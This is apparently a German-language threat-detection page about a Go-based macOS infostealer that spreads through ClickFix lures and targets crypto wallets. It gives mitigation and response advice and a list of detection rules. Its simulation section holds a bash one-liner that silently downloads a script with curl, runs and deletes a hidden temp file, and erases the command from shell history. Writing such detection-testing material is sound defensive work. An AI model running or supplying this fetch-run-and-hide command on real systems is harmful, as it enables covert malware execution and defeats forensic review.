macOS-Infostealer zielt auf Kryptowährungs-Wallets ab
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein auf Go basierender macOS-Stealer zielt auf Kryptowährungsnutzer durch eine ClickFix-Sozialingenieurkampagne ab. Die Malware stiehlt sensible Anmeldeinformationen aus dem Apple-Schlüsselbund und aus Browser-Speichern und verfügt zudem über die Fähigkeit, nach und nach die Kryptowährungsbestände in den Wallets der Opfer zu leeren. Die Infektionskette beginnt mit einem Shell-Skript-Profiler, der architekturspezifische Mach-O-Nutzlasten liefert.
Untersuchung
Huntress-Analysten entdeckten die Bedrohung während einer retrospektiven Suche und identifizierten Komponenten eines macOS-spezifischen Stealers, der etwa drei Monate lang aktiv geblieben war. Die Untersuchung verknüpfte die unterstützende Infrastruktur mit der Aeza Group, einem sanktionierten russischen bulletproof Hosting-Anbieter. Forscher rekonstruierten die Angriffskette vom anfänglichen ClickFix-Sozialtechnik-Anstoß bis zur endgültigen Ausführung der Nutzlast und der C2-Kommunikation.
Minderung
Nutzer sollten es vermeiden, mit verdächtigen CAPTCHA-Aufforderungen zu interagieren oder ungewöhnlichen Anweisungen zu folgen, die erfordern, dass Befehle im Terminal eingegeben werden. Browsererweiterungen, die zur Einschränkung bösartiger Skripte entwickelt wurden, wie NoScript, und DNS-basierte Blockierungstools wie Pi-hole können dazu beitragen, die Exposition zu reduzieren. Umfassende Schulungen zur Nutzerbewusstseinsbildung, die sich auf ClickFix-Sozialtechnik konzentrieren, bleiben eine der effektivsten Verteidigungen.
Antwort
Wenn eine Infektion festgestellt wird, sollte das betroffene macOS-System sofort isoliert werden, um weiteren Datenabfluss oder das Leeren der Kryptowährungswallets zu stoppen. Administratoren sollten alle bösartigen Mach-O-Binärdateien und damit verbundene Persistenzmechanismen lokalisieren und entfernen. Da die Malware Anmeldeinformationen anvisiert, sollten die Passwörter aller von dem kompromittierten Gerät aus zugegriffenen Konten zurückgesetzt werden.
Angriffsfluss
Erkennungen
Launchctl-Bootstrap von einem nicht-standardmäßigen Pfad (via process_creation)
Proof of Value
Möglicher System_profiler-Enumeration-Versuch (via process_creation)
Proof of Value
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Proof of Value
IOCs (HashSha256) zur Erkennung: Wallet-leerende macOS-Malware will Ihr Krypto
Proof of Value
IOCs (SourceIP) zur Erkennung: Wallet-leerende macOS-Malware will Ihr Krypto
Proof of Value
IOCs (DestinationIP) zur Erkennung: Wallet-leerende macOS-Malware will Ihr Krypto
Proof of Value
Erkennung von MacOS-Malware-Persistenz- und Ausführungstechniken [Linux Dateiereignis]
Proof of Value
Wallet-leerende macOS-Malware-Angriff [Linux Prozess-Erstellung]
Proof of Value
Simulation-Ausführung
Voraussetzung: Der Telemetrie- & Basiswert-Vorflug-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und das Szenario MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Angreifer initiiert einen ClickFix-Betrug. Das Opfer wird dazu verleitet, einen Befehl in seinem Terminal auszuführen. Der Befehl verwendet
curl -kFsSLum ein bösartiges Skript stillschweigend herunterzuladen. Um keine Spuren zu hinterlassen, wird das Skript über einen Bash-One-Liner ausgeführt, der sofort seine eigene temporäre Datei löscht (.UlaccK). Schließlich führt der Angreifer einen komplexenhistory-Befehl aus, um den Befehl gezielt aus dem Shell-Verlauf des Benutzers zu entfernen, wodurch der Angriff für eine ungezwungene forensische Untersuchung unsichtbar wird. -
Regressionstests-Skript:
#!/bin/bash # Simulation des ClickFix macOS-Malware-Angriffs # Dieses Skript ahmt die genauen Zeichenfolgenmuster nach, die von der Erkennungsregel gefordert werden. echo "[+] Simulation wird gestartet..." # 1. Simulierung des Curl-Downloads (Auswahl 3) # 2. Simulierung der Bash-Ausführung und sofortigen Löschung (Auswahl 1) # 3. Simulierung der Verlaufmanipulation (Auswahl 2) # Wir kombinieren diese in eine einzelne Zeile, um das Verhaltensmuster nachzuahmen # Hinweis: Wir verwenden eine Dummy-URL, um eine tatsächliche Malware-Ausführung zu vermeiden curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] Simulationsbefehl ausgeführt." echo "[!] Überprüfen Sie Ihr SIEM auf den 'Wallet-Depleting macOS Malware Attack'-Alarm." -
Säuberungskommandos:
# Entfernen Sie alle Überbleibsel der Simulation rm -f .UlaccK # Hinweis: Die Verlaufmanipulation im Skript soll der Evasion dienen; # eine manuelle Wiederherstellung des Verlaufs könnte für den Testbenutzer erforderlich sein.